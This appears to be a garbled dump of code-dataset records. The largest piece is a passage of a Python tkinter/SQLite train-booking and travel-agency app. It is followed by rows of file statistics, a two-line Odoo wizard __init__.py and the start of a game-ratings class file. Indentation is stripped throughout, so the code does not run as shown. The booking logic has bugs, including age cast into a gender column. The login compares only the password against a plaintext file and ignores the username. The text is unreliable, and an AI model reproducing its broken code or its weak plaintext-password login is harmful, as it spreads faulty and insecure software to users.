cursor.execute("Select * from Rail88 where Trainnumber=12245")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12249:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12249")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!", bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def PassengerDetails4():
global x1
if en29.get() == "12238":
x1 = 12238
elif en29.get() == "12242":
x1 = 12242
elif en29.get() == "12246":
x1 = 12246
else:
x1=12250
def PassengerDetails():
window1.destroy()
window2 = Tk()
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1")
e11.insert(10, "2")
e16.insert(10, "3")
e21.insert(10, "4")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1
window3 = Toplevel(master)
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11)).place(x=320, y=170)
Name = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=170, y=50, height=25)
Gender = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=50, height=25)
DepartureTime = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=210, y=90,
height=25)
Age = Label(window3, justify="center",bg='white', font=('Slab Serif', 10)).place(x=380, y=90, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
Source = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=170, height=25)
Destination = Label(window3, justify="center",bg='white', font=('Slab Serif', 9)).place(x=180, y=250,
height=25)
Number = Label(window3,text=count, justify="center",bg='white', font=('Slab Serif', 9)).place(x=170, y=290, height=25)
global conn, cursor, x1, x2
if x1 == 12238:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12238")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], bg='white',justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12242:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12242")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3,bg='white', justify="center", text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], bg='white',justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12246:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12246")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], bg='white',justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12250:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12250")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], bg='white',justify="center", font=('Slab Serif', 10)).place(
x=170, y=170,
height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
Label(window3, text="Have a happy & safe Journey!!", bg='white',fg='orange red',font=('Comic Sans MS', 23,'bold')).place(x=200, y=340)
mainloop()
if len(enn7.get()) == 0 or len(enn8.get()) == 0 or len(enn9.get()) == 0 or len(e10.get()) == 0:
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e12.get()) != 0 and (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e17.get()) != 0 and (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif len(e22.get()) != 0 and (len(e23.get()) == 0 or len(e24.get()) == 0 or len(e25.get()) == 0):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(e12.get()) != 0 or len(e13.get()) != 0 or len(e14.get()) != 0 or len(
e15.get()) != 0) and (
len(e22.get()) != 0 or len(e23.get()) != 0 or len(e24.get()) != 0 or len(
e25.get()) != 0) and (
len(e17.get()) == 0 or (len(e18.get()) == 0 or len(e19.get()) == 0 or len(e20.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif (len(enn7.get()) != 0 or len(enn8.get()) != 0 or len(enn9.get()) != 0 or len(
e10.get()) != 0) and (
len(e17.get()) != 0 or len(e18.get()) != 0 or len(e19.get()) != 0 or len(
e20.get()) != 0) and (
len(e12.get()) == 0 or (len(e13.get()) == 0 or len(e14.get()) == 0 or len(e15.get()) == 0)):
tkinter.messagebox.showinfo('Error', 'enter all required fields')
elif enn7.get()!="" and e12.get()=="" and e17.get()=="" and e22.get()=="":
count=1
Show()
elif e12.get()!="" and e17.get()=="":
count=2
Show()
elif e17.get()!="" and e22.get()=="":
count=3
Show()
elif e22.get()!="":
count=4
Show()
else:
Show()
b = Button(window2, text='Proceed', bg="slategray3", font=('Britannic Bold', 16), command=Check1)
b.place(x=450, y=255)
mainloop()
PassengerDetails()
def Back1():
window1.destroy()
button1=Button(window1,text="Book Train 1",font=('Fixedsys',14),width=15,bg="chocolate1",command=PassengerDetails1)
button1.place(x=435,y=140)
button2 = Button(window1, text="Book Train 2",font=('Fixedsys',14),width=15, bg="chocolate1",command=PassengerDetails2)
button2.place(x=435,y=180)
button3 = Button(window1, text="Book Train 3",font=('Fixedsys',14),width=15, bg="chocolate1", command=PassengerDetails3)
button3.place(x=435,y=220)
button4 = Button(window1, text="Book Train 4",font=('Fixedsys',14),width=15,bg="chocolate1", command=PassengerDetails4)
button4.place(x=435,y=260)
button5 = Button(window1, text="Back",font=('Segoe UI Black',15),width=60, bg="spring green", fg="gray23", command=Back1)
button5.place(x=450,y=400,width=100)
mainloop()
def Cancellation():
root.destroy()
window4 = Toplevel(master)
window4.title("Ticket Cancellation")
window4.geometry('750x500+90+90')
window4.config(bg='red3')
cancel = Label(window4, text="Enter PNR No.", font=('System', 23), bg="chocolate2", fg="white").place(x=150, y=210)
e=Entry(window4,justify="center", font=('System', 20), bg="white", fg="chocolate2")
e.place(x=360, y=210)
def Delete1():
result = tkinter.messagebox.askquestion('Ask', 'Are you sure you want to Cancel your booked ticket?',
icon="warning")
if result == 'Yes':
cursor = conn.cursor()
cursor.execute("Select pnr from Rail999")
d = cursor.fetchall()
at=str(d)
d1=at.replace('(','')
d2 = d1.replace(')', '')
d3 = d2.replace(',', '')
d4=d3.replace('[','')
d5 = d4.replace(']', '')
d6=d5.split(' ')
q=0
for i in range(1,len(d6)):
if e.get()==d6[i]:
x123=e.get()
q=1
if q==1:
cursor.execute("Delete from Rail999 where pnr=?",(x123,))
tkinter.messagebox.showinfo('Success', 'Ticket Cancelled Successfully')
window4.destroy()
else:
tkinter.messagebox.showinfo('Error', 'Unable to Find the Ticket')
cursor.close()
conn.close()
def Delete():
if (len(e.get())==""):
tkinter.messagebox.showinfo('Error', 'Enter required PNR No.')
else:
Delete1()
def Back():
window4.destroy()
Button(window4, text="Back", font=('Segoe UI Black', 18), bg="yellow4", fg="tomato4",command=Back).place(x=185,y=310,width=120)
Button(window4, text="Cancel", font=('Segoe UI Black', 18), bg="yellow4", fg="tomato4",command=Delete
).place(x=440, y=310, width=120)
mainloop()
e1.config(font=('Segoe UI Black',18),bg="light sea green",fg="coral4")
e1.place(x=550,y=360,height=30,width=200)
Button(root,text="Available trains",font=('MS Serif',18), bg="plum4",fg="lawn green",command=Check).place(x=200,y=420,width=220)
Button(root, text="Train Cancellation",font=('MS Serif',18), bg="plum4",fg="lawn green",command=Cancellation).place(x=525,y=420,width=250)
mainloop()
#======Page 2======#
def __init__(self, masters):
self.masters = masters
self.frame = tk.Frame(self.master)
self.frame.pack
def masters():
masters= Toplevel(master)
masters.geometry('1050x750')
masters.title('Travel Agency 1')
Label(masters,fg="firebrick4",bg="khaki2", text = "Welcome To ASRD Travel Agency", font=("impact",33)).place(x=220,y=100)
Label(masters,fg="orange3",bg="darkblue", text = "Travel with Comfort...", font=("Comic Sans MS",28,"bold")).place(x=320,y=200)
Button(masters,text="Railways", font=('Calibri',12),width=20,command=road).grid(row=3,sticky=N)
def tavelQuit():
masters.destroy()
def login_function():
with open("pass.txt","r") as o:
with open("username.txt","r") as f:
data=f.read()
global masters
pasw=o.read()
passw=pasw.split()
if master.txt_user.get()=="" :
notif.config(fg="red", text="ERROR !!! Please Fill The Details")
elif master.txt_pass.get()not in passw:
notif.config(fg="red", text="ERROR!! Invalid Username/Password")
else:
masters= Toplevel(master)
masters.title('Travel Agency 1')
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=0,sticky=N)
Label(masters,fg="firebrick4",bg="khaki2", text = "Welcome To ASRD Travel Agency", font=("impact",33)).place(x=220,y=100)
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=0,sticky=N)
Label(masters,fg="orange3",bg="darkblue", text = "Travel with Comfort...", font=("Comic Sans MS",28,"bold")).place(x=320,y=200)
Button(masters,text="RAILWAYS",bg="gray55", font=("Fixedsys",18,"italic"),width=20,command=createWindow).place(x=366,y=300)
Button(masters,text="AIRWAYS",bg="gray55", font=("Fixedsys",18,"italic"),width=20,command=air).place(x=366,y=400)
Button(masters,text="QUIT",fg="gold",bg="red", font=('Calibri',12),width=20,command=tavelQuit).place(x=450,y=600)
Label(masters,fg="white", text = " ", font=('Calibri',12)).grid(row=6,sticky=N)
#======Login Frame======#
Frame_login=Frame(master, bg="white")
Frame_login.place(x=150,y=150,height=340,width=500)
title=Label(Frame_login,text="Login Here",font=("Impact",35,"bold"),fg="#d77337",bg="white").place(x=90,y=30)
desc=title=Label(Frame_login,text="Enter Your Login Details",font=("Goudy old style",13,"bold"),fg="#d23d17",bg="white").place(x=90,y=100)
lbl_user=title=Label(Frame_login,text="USERNAME:-",font=("Goudy old style",15,"bold"),fg="grey",bg="white").place(x=90,y=140)
master.txt_user=Entry(Frame_login,font=("times new roman",15),bg="lightgreen")
master.txt_user.place(x=90,y=170,width=350,height=35)
lbl_pass=title=Label(Frame_login,text="PASSWORD:-",font=("Goudy old style",15,"bold"),fg="grey",bg="white").place(x=90,y=210)
master.txt_pass=Entry(Frame_login,show="*",font=("times new roman",15),bg="lightgreen")
master.txt_pass.place(x=90,y=240,width=350,height=35)
forget_btn=Button(Frame_login,text="Forgot Password?",bg="white",fg="#d77337",bd=0,font=("times new roman",12)).place(x=90,y=280)
Login_btn=Button(master,text="Login",fg="white",bg="#d77337",font=("times new roman",21),command=login_function).place(x=300,y=470,width=180,height=40)
master.mainloop()
| 52.737222 | 186 | 0.432846 | 17,924 | 175,404 | 4.225006 | 0.047757 | 0.055567 | 0.049836 | 0.029579 | 0.828784 | 0.804566 | 0.785485 | 0.761307 | 0.746121 | 0.735293 | 0 | 0.097958 | 0.41771 | 175,404 | 3,325 | 187 | 52.753083 | 0.643495 | 0.009139 | 0 | 0.70146 | 0 | 0.000365 | 0.129921 | 0.002285 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028467 | false | 0.011314 | 0.004015 | 0 | 0.033212 | 0.000365 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f5ab5882dfa3ec5853770b2d2f6c03afc027e35f | 139 | py | Python | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | import_product_inventory/wizard/__init__.py | TerraColligo/tc_odoo_addons | 464c062a54ef07c0ec158b0f5a3cb5aae9fbada1 | [
"CC0-1.0"
] | null | null | null | # -*- coding: utf-8 -*-
from . import import_product_wizard
from . import import_cierres_product_wizard
from . import export_product_wizard | 34.75 | 43 | 0.798561 | 19 | 139 | 5.473684 | 0.473684 | 0.288462 | 0.307692 | 0.442308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00813 | 0.115108 | 139 | 4 | 44 | 34.75 | 0.837398 | 0.151079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
f5f0c444b0c2cb8d70e59a19e607a4d3d56a2cc8 | 6,959 | py | Python | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_gangplank/na_gangplank_jng.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from getratings.models.ratings import Ratings
class NA_Gangplank_Jng_Aatrox(Ratings):
pass
class NA_Gangplank_Jng_Ahri(Ratings):
pass
